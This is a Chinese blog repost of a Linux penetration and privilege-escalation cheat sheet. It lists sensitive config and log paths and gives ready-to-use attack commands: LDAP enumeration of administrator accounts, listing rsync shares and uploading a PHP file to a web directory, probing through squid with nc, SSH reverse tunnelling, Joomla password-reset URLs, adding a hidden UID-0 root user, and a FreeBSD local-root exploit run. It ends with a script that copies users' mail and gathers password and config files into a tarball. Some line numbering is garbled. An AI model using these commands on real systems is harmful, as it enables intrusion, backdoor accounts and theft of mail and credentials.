LINUX渗透与提权总结

最新推荐文章于 2023-06-04 14:53:55 发布
最新推荐文章于 2023-06-04 14:53:55 发布
阅读量565 收藏 3
点赞数 1
文章标签: php 数据库 ldap

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径:

001/etc/passwd
002 
003/etc/shadow
004 
005/etc/fstab
006 
007/etc/host.conf
008 
009/etc/motd
010 
011/etc/ld.so.conf
012 
013/var/www/htdocs/index.php
014 
015/var/www/conf/httpd.conf
016 
017/var/www/htdocs/index.html
018 
019/var/httpd/conf/php.ini
020 
021/var/httpd/htdocs/index.php
022 
023/var/httpd/conf/httpd.conf
024 
025/var/httpd/htdocs/index.html
026 
027/var/httpd/conf/php.ini
028 
029/var/www/index.html
030 
031/var/www/index.php
032 
033/opt/www/conf/httpd.conf
034 
035/opt/www/htdocs/index.php
036 
037/opt/www/htdocs/index.html
038 
039/usr/local/apache/htdocs/index.html
040 
041/usr/local/apache/htdocs/index.php
042 
043/usr/local/apache2/htdocs/index.html
044 
045/usr/local/apache2/htdocs/index.php
046 
047/usr/local/httpd2.2/htdocs/index.php
048 
049/usr/local/httpd2.2/htdocs/index.html
050 
051/tmp/apache/htdocs/index.html
052 
053/tmp/apache/htdocs/index.php
054 
055/etc/httpd/htdocs/index.php
056 
057/etc/httpd/conf/httpd.conf
058 
059/etc/httpd/htdocs/index.html
060 
061/www/php/php.ini
062 
063/www/php4/php.ini
064 
065/www/php5/php.ini
066 
067/www/conf/httpd.conf
068 
069/www/htdocs/index.php
070 
071/www/htdocs/index.html
072 
073/usr/local/httpd/conf/httpd.conf
074 
075/apache/apache/conf/httpd.conf
076 
077/apache/apache2/conf/httpd.conf
078 
079/etc/apache/apache.conf
080 
081/etc/apache2/apache.conf
082 
083/etc/apache/httpd.conf
084 
085/etc/apache2/httpd.conf
086 
087/etc/apache2/vhosts.d/00_default_vhost.conf
088 
089/etc/apache2/sites-available/default
090 
091/etc/phpmyadmin/config.inc.php
092 
093/etc/mysql/my.cnf
094 
095/etc/httpd/conf.d/php.conf
096 
097/etc/httpd/conf.d/httpd.conf
098 
099/etc/httpd/logs/error_log
100 
101/etc/httpd/logs/error.log
102 
103/etc/httpd/logs/access_log
104 
105/etc/httpd/logs/access.log
106 
107/home/apache/conf/httpd.conf
108 
109/home/apache2/conf/httpd.conf
110 
111/var/log/apache/error_log
112 
113/var/log/apache/error.log
114 
115/var/log/apache/access_log
116 
117/var/log/apache/access.log
118 
119/var/log/apache2/error_log
120 
121/var/log/apache2/error.log
122 
123/var/log/apache2/access_log
124 
125/var/log/apache2/access.log
126 
127/var/www/logs/error_log
128 
129/var/www/logs/error.log
130 
131/var/www/logs/access_log
132 
133/var/www/logs/access.log
134 
135/usr/local/apache/logs/error_log
136 
137/usr/local/apache/logs/error.log
138 
139/usr/local/apache/logs/access_log
140 
141/usr/local/apache/logs/access.log
142 
143/var/log/error_log
144 
145/var/log/error.log
146 
147/var/log/access_log
148 
149/var/log/access.log
150 
151/usr/local/apache/logs/access_logaccess_log.old
152 
153/usr/local/apache/logs/error_logerror_log.old
154 
155/etc/php.ini
156 
157/bin/php.ini
158 
159/etc/init.d/httpd
160 
161/etc/init.d/mysql
162 
163/etc/httpd/php.ini
164 
165/usr/lib/php.ini
166 
167/usr/lib/php/php.ini
168 
169/usr/local/etc/php.ini
170 
171/usr/local/lib/php.ini
172 
173/usr/local/php/lib/php.ini
174 
175/usr/local/php4/lib/php.ini
176 
177/usr/local/php4/php.ini
178 
179/usr/local/php4/lib/php.ini
180 
181/usr/local/php5/lib/php.ini
182 
183/usr/local/php5/etc/php.ini
184 
185/usr/local/php5/php5.ini
186 
187/usr/local/apache/conf/php.ini
188 
189/usr/local/apache/conf/httpd.conf
190 
191/usr/local/apache2/conf/httpd.conf
192 
193/usr/local/apache2/conf/php.ini
194 
195/etc/php4.4/fcgi/php.ini
196 
197/etc/php4/apache/php.ini
198 
199/etc/php4/apache2/php.ini
200 
201/etc/php5/apache/php.ini
202 
203/etc/php5/apache2/php.ini
204 
205/etc/php/php.ini
206 
207/etc/php/php4/php.ini
208 
209/etc/php/apache/php.ini
210 
211/etc/php/apache2/php.ini
212 
213/web/conf/php.ini
214 
215/usr/local/Zend/etc/php.ini
216 
217/opt/xampp/etc/php.ini
218 
219/var/local/www/conf/php.ini
220 
221/var/local/www/conf/httpd.conf
222 
223/etc/php/cgi/php.ini
224 
225/etc/php4/cgi/php.ini
226 
227/etc/php5/cgi/php.ini
228 
229/php5/php.ini
230 
231/php4/php.ini
232 
233/php/php.ini
234 
235/PHP/php.ini
236 
237/apache/php/php.ini
238 
239/xampp/apache/bin/php.ini
240 
241/xampp/apache/conf/httpd.conf
242 
243/NetServer/bin/stable/apache/php.ini
244 
245/home2/bin/stable/apache/php.ini
246 
247/home/bin/stable/apache/php.ini
248 
249/var/log/mysql/mysql-bin.log
250 
251/var/log/mysql.log
252 
253/var/log/mysqlderror.log
254 
255/var/log/mysql/mysql.log
256 
257/var/log/mysql/mysql-slow.log
258 
259/var/mysql.log
260 
261/var/lib/mysql/my.cnf
262 
263/usr/local/mysql/my.cnf
264 
265/usr/local/mysql/bin/mysql
266 
267/etc/mysql/my.cnf
268 
269/etc/my.cnf
270 
271/usr/local/cpanel/logs
272 
273/usr/local/cpanel/logs/stats_log
274 
275/usr/local/cpanel/logs/access_log
276 
277/usr/local/cpanel/logs/error_log
278 
279/usr/local/cpanel/logs/license_log
280 
281/usr/local/cpanel/logs/login_log
282 
283/usr/local/cpanel/logs/stats_log
284 
285/usr/local/share/examples/php4/php.ini
286 
287/usr/local/share/examples/php/php.ini
288 
289/usr/local/tomcat5527/bin/version.sh
290 
291/usr/share/tomcat6/bin/startup.sh
292 
293/usr/tomcat6/bin/startup.sh

 liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

11.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

12.less /etc/ldap.conf
2 
3base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

11.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

12.less /etc/ldap.conf
2 
3base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

01ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
02 
03version: 1
04 
05dn: dc=ruc,dc=edu,dc=cn
06 
07dc: ruc
08 
09objectClass: domain
10 
11dn: uid=manager,dc=ruc,dc=edu,dc=cn
12 
13uid: manager
14 
15objectClass: inetOrgPerson
16 
17objectClass: organizationalPerson
18 
19objectClass: person
20 
21objectClass: top
22 
23sn: manager
24 
25cn: manager
26 
27dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
28 
29uid: superadmin
30 
31objectClass: inetOrgPerson
32 
33objectClass: organizationalPerson
34 
35objectClass: person
36 
37objectClass: top
38 
39sn: superadmin
40 
41cn: superadmin
42 
43dn: uid=admin,dc=ruc,dc=edu,dc=cn
44 
45uid: admin
46 
47objectClass: inetOrgPerson
48 
49objectClass: organizationalPerson
50 
51objectClass: person
52 
53objectClass: top
54 
55sn: admin
56 
57cn: admin
58 
59dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
60 
61uid: dcp_anonymous
62 
63objectClass: top
64 
65objectClass: person
66 
67objectClass: organizationalPerson
68 
69objectClass: inetOrgPerson
70 
71sn: dcp_anonymous
72 
73cn: dcp_anonymous
2.查看基类
1bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

001bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
002 
003version: 1
004 
005dn:
006 
007objectClass: top
008 
009namingContexts: dc=ruc,dc=edu,dc=cn
010 
011supportedExtension: 2.16.840.1.113730.3.5.7
012 
013supportedExtension: 2.16.840.1.113730.3.5.8
014 
015supportedExtension: 1.3.6.1.4.1.4203.1.11.1
016 
017supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
018 
019supportedExtension: 2.16.840.1.113730.3.5.3
020 
021supportedExtension: 2.16.840.1.113730.3.5.5
022 
023supportedExtension: 2.16.840.1.113730.3.5.6
024 
025supportedExtension: 2.16.840.1.113730.3.5.4
026 
027supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
028 
029supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
030 
031supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
032 
033supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
034 
035supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
036 
037supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
038 
039supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
040 
041supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
042 
043supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
044 
045supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
046 
047supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
048 
049supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
050 
051supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
052 
053supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
054 
055supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
056 
057supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
058 
059supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
060 
061supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
062 
063supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
064 
065supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
066 
067supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
068 
069supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
070 
071supportedExtension: 1.3.6.1.4.1.1466.20037
072 
073supportedExtension: 1.3.6.1.4.1.4203.1.11.3
074 
075supportedControl: 2.16.840.1.113730.3.4.2
076 
077supportedControl: 2.16.840.1.113730.3.4.3
078 
079supportedControl: 2.16.840.1.113730.3.4.4
080 
081supportedControl: 2.16.840.1.113730.3.4.5
082 
083supportedControl: 1.2.840.113556.1.4.473
084 
085supportedControl: 2.16.840.1.113730.3.4.9
086 
087supportedControl: 2.16.840.1.113730.3.4.16
088 
089supportedControl: 2.16.840.1.113730.3.4.15
090 
091supportedControl: 2.16.840.1.113730.3.4.17
092 
093supportedControl: 2.16.840.1.113730.3.4.19
094 
095supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
096 
097supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
098 
099supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
100 
101supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
102 
103supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
104 
105supportedControl: 2.16.840.1.113730.3.4.14
106 
107supportedControl: 1.3.6.1.4.1.1466.29539.12
108 
109supportedControl: 2.16.840.1.113730.3.4.12
110 
111supportedControl: 2.16.840.1.113730.3.4.18
112 
113supportedControl: 2.16.840.1.113730.3.4.13
114 
115supportedSASLMechanisms: EXTERNAL
116 
117supportedSASLMechanisms: DIGEST-MD5
118 
119supportedLDAPVersion: 2
120 
121supportedLDAPVersion: 3
122 
123vendorName: Sun Microsystems, Inc.
124 
125vendorVersion: Sun-Java(tm)-System-Directory/6.2
126 
127dataversion: 020090516011411
128 
129netscapemdsuffix: cn=ldap://dc=webA:389
130 
131supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
132 
133supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
134 
135supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
136 
137supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
138 
139supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
140 
141supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
142 
143supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
144 
145supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
146 
147supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
148 
149supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
150 
151supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
152 
153supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
154 
155supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
156 
157supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
158 
159supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
160 
161supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
162 
163supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
164 
165supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
166 
167supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
168 
169supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
170 
171supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
172 
173supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
174 
175supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
176 
177supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
178 
179supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
180 
181supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
182 
183supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
184 
185supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
186 
187supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
188 
189supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
190 
191supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
192 
193supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
194 
195supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
196 
197supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
198 
199supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
200 
201supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
202 
203supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
204 
205supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
206 
207supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
208 
209supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
210 
211supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
212 
213supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
214 
215supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
216 
217supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
218 
219supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
220 
221supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
222 
223supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
224 
225supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
226 
227supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
 

 liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

列举IP:

1showmount -e ip

 liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

1.查看rsync服务器上的列表:

01rsync 210.51.X.X::
02 
03finance
04 
05img_finance
06 
07auto
08 
09img_auto
10 
11html_cms
12 
13img_cms
14 
15ent_cms
16 
17ent_img
18 
19ceshi
20 
21res_img
22 
23res_img_c2
24 
25chip
26 
27chip_c2
28 
29ent_icms
30 
31games
32 
33gamesimg
34 
35media
36 
37mediaimg
38 
39fashion
40 
41res-fashion
42 
43res-fo
44 
45taobao-home
46 
47res-taobao-home
48 
49house
50 
51res-house
52 
53res-home
54 
55res-edu
56 
57res-ent
58 
59res-labs
60 
61res-news
62 
63res-phtv
64 
65res-media
66 
67home
68 
69edu
70 
71news
72 
73res-book

看相应的下级目录(注意一定要在目录后面添加上/)

1rsync 210.51.X.X::htdocs_app/
2 
3rsync 210.51.X.X::auto/
4 
5rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件

1rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

1rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
2 
3http://app.finance.xxx.com/warn/nothack.txt

 liunx 相关提权渗透技巧总结,四、squid渗透技巧:

1nc -vv 91ri.org 80
2 
3GET HTTP://www.sina.com / HTTP/1.0
4 
5GET HTTP://WWW.sina.com:22 / HTTP/1.0

 liunx 相关提权渗透技巧总结,五、SSH端口转发:

1ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

 liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

确定版本:

1index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码:

1index.php?option=com_user&view=reset&layout=confirm

 liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

1useradd -o -u 0 nothack

 liunx 相关提权渗透技巧总结,八、freebsd本地提权:

01[argp@julius ~]$ uname -rsi
02 
03* freebsd 7.3-RELEASE GENERIC
04 
05* [argp@julius ~]$ sysctl vfs.usermount
06 
07* vfs.usermount: 1
08 
09* [argp@julius ~]$ id
10 
11* uid=1001(argp) gid=1001(argp) groups=1001(argp)
12 
13* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
14 
15* [argp@julius ~]$ ./nfs_mount_ex
16 
17*
18 
19calling nmount()

 tar 文件夹打包:

1、tar打包:

1tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
2 
3alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

{

注:

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

1tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

}

系统信息收集:

view source
01for linux:
02 
03#!/bin/bash
04 
05echo #######geting sysinfo####
06 
07echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
08 
09echo #######basic infomation##
10 
11cat /proc/meminfo
12 
13echo
14 
15cat /proc/cpuinfo
16 
17echo
18 
19rpm -qa 2>/dev/null
20 
21######stole the mail......######
22 
23cp -a /var/mail /tmp/getmail 2>/dev/null
24 
25echo 'u'r id is' `id`
26 
27echo ###atq&crontab#####
28 
29atq
30 
31crontab -l
32 
33echo #####about var#####
34 
35set
36 
37echo #####about network###
38 
39####this is then point in pentest,but i am a new bird,so u need to add some in it
40 
41cat /etc/hosts
42 
43hostname
44 
45ipconfig -a
46 
47arp -v
48 
49echo ########user####
50 
51cat /etc/passwd|grep -i sh
52 
53echo ######service####
54 
55chkconfig --list
56 
57for i in {oracle,mysql,tomcat,samba,apache,ftp}
58 
59cat /etc/passwd|grep -i $i
60 
61done
62 
63locate passwd >/tmp/password 2>/dev/null
64 
65sleep 5
66 
67locate password >>/tmp/password 2>/dev/null
68 
69sleep 5
70 
71locate conf >/tmp/sysconfig 2>dev/null
72 
73sleep 5
74 
75locate config >>/tmp/sysconfig 2>/dev/null
76 
77sleep 5
78 
79###maybe can use "tree /"###
80 
81echo ##packing up#########
82 
83tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
84 
85rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
 
weixin_34255793
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux实验总结及心得_安全实验室 | 内网渗透Linux权限维持技巧总结
weixin_28929303的博客
01-14 541
在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索。Linux也是在内网渗透中很常见的操作系统,但是其内部实现方式却与Windows有着本质的区别。我们在对Windows权限维持方式的基础上总结Linux系统的权限维持方式。01SUID后门SUID是Set uid的简称,当一个文...
LINUX相关渗透提权经验技巧总结.txt
最新发布
01-09
Linux系统安全学习
LINUX之内网渗透提权
weixin_34268753的博客
03-25 170
渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空再...
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7533
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
Linux简单渗透
YUGUOHOU的博客
11-26 2944
本文介绍了一个我自己在课堂上学习的针对Linux渗透测试工具,做的一个渗透小实验。网络安全是大小型企业都非常关心的问题。 在当今越来越多的企业转向提供服务的在线媒体的时代,面对网络攻击的威胁不断增加。这意味着越来越多的企业正在寻求自我保护。 这导致对渗透测试人员和道德黑客的需求增加。 第一步: 下载一个jave软件,用于后期渗透,还有一个安装过LAMP的centos7 第二步: 这里我们是用了一个小的编程程序,来进行渗透,这个带着咖啡图标的就是我们需要用到的东西 第三步: 打...
B-3:Linux 系统渗透提权
JJH2724719395的博客
06-04 1056
4.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的文本内容作 为 flag 提交;6.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的图片内容作 为 flag 提交。5.使用渗透机对服务器管理员提权,并将服务器中 root 的密码作为 flag 提交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为 flag 提交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为 flag 提交;
linux提权总结8大类型,30多种方式
09-27
### Linux提权总结渗透测试与安全领域中,Linux提权是一项重要的技能,它能够帮助安全研究人员在发现系统漏洞后进一步提升权限,以便更好地理解系统存在的安全隐患,并采取相应的安全措施。本文档根据给定的文件...
Linux提权的简单总结1
08-03
Linux系统中,权限管理是安全的核心组成部分,提权是指非特权用户获取更高权限的过程,通常是为了系统管理和安全测试。本文将围绕Linux提权的基本概念、文件权限解析以及提权思路进行深入探讨。 首先,理解Linux...
Linux使用suid vim.basic文件实现提权
09-14
这种方式在安全环境中是不允许的,但在渗透测试或漏洞分析中,了解这种提权方法有助于提升网络安全意识和防护能力。当然,对于系统管理员来说,定期检查和限制不必要的SUID文件是防范此类攻击的重要措施。
Windows,Linux等系统提权工具
01-20
以上提到的各种工具和技术都属于系统提权的重要组成部分,它们在渗透测试和安全审计过程中发挥着至关重要的作用。对于IT安全从业者而言,熟练掌握这些工具的使用方法是必不可少的能力之一。通过合理使用这些工具,...
渗透测试--Linux提权
songbai220
12-11 649
Linux提权 linux发行版本 CentOS 运维人员,系统简单,适合服务器 Redhat 运维 Ubuntu 开发人员 Kali 安全人员,集成安全测试环境和工-具 Linux内核版本 Linux内核版本号由3组数字组成,第一组为内核主版本号,第二组奇数为开发版,偶数为稳定版,第三组数字是该版本错误修改升级的次数 稳定版 发行版 查看发行版本 cat /etc/issue cat /etc/*-release 查看内核版本 uname -a root@kali:~# uname -a
Linux操作系统渗透测试
明裕学长的博客
05-24 4846
Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 1.通过Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为Flag提交; 在终端中输入 nmap -O 172.16.105.25
网路安全技能竞赛——【Linux操作系统渗透提权】解析(超级详细)
旺仔Sec&blog
05-30 1585
网路安全技能竞赛——【Linux操作系统渗透提权】解析(超级详细),需要练习靶机可以私信博主哈
linux 渗透 系统,初识Linux渗透:从枚举到内核利用
weixin_32557421的博客
04-29 433
背景许多人都认为Linux是最安全的操作系统,因此在对Linux的安全问题上也放松了警惕。那么事实真的如此吗?其实安全从来都只是相对的,Linux也不例外。虽然它加载了强大的安全机制,但仍可能受到来自各方面带来的安全威胁。本文我们主要将讨论有关Linux架构的主要利用技术,以及相关的安全防御措施。PS:本文仅用于技术讨论与分享,严禁用于非法用途Linux 概述操作系统的主要目的是用于管理计算机硬件...
Linux渗透测试
Fly_鹏程万里
05-31 3206
前言最近发现了一个不错的靶场,里面各种渗透测试的虚拟机,大家可以下载进行尝试学习。还有就是一个漏洞利用存档,可以找到很多我们可以利用的学习的东西。靶场:https://www.vulnhub.com漏洞利用存档:https://www.exploit-db.com0x01 信息搜集首先就是确定我们靶机的目标nmap -sP -T5 192.168.0.1/24 通过前面的步骤,我们对目标进行具体的...
Linux渗透操作
多喝i热水的博客
08-30 793
一、信息收集 1、系统和设备信息 uname -a 打印所有可用的系统信息 uname -r 内核版本 uname -n 系统主机名 uname -m 查看系统内核架构 hostname 系统主机名 cat /proc/version 内核信息 cat /etc/issue 分发信息 cat /proc/cpuinfo CPU信息 2、用户和群组 cat /etc/passwd 列出系统上的所有用户 cat /etc/group 列出系统上所有组 grep-v-E"^#"/etc.
linux渗透的奇技淫巧
river
03-24 2242
linux渗透的奇技淫巧在网上get到了一个给Linux添加用户的技巧,通过环境变量执行脚本,进而达到添加 用户的目的。算不上是提权,记录一下,或许以后会有用。 通常,Linux在执行bash脚本时,如果BASH_ENV被设置的话,它就会执行BASH_ENV指向 的脚本。 首先先看一个例子第一步:建立一个test.sh脚本!#/bin/bash echo "test"第二步:在/tmp/目录下建
Linux渗透提权:技巧总结
xiaoxuetu_的博客
08-24 1070
转载自:http://www.91ri.org/7911.html 本文为Linux渗透提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。 Linux 系统下的一些常见路径: Default 12345678910111213
Linux渗透命令(2)
qq_40529133的博客
05-12 483
uname -r #查看内核版本 last -30 #查看最后登录的30个用户 rm -rf # 删除系统所有文件 arp -a #查看网段内其他主机 lsattr -va #查看文件attr属性‘ find / -type f -perm -04000 -ls #查看所有ruid权限根目录 find / -type f -perm -0200...
Linux提权攻略:8大类型,30种方法解析
"这篇文档是关于Linux提权的综合总结,涵盖了8大类型的提权方法,包括内核提权、服务提权、sudo提权、suid提权、sgid提权、定时任务提权、nfs提权等,适合初学者理解。文档中还提供了具体的实践操作示例,如自定义可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值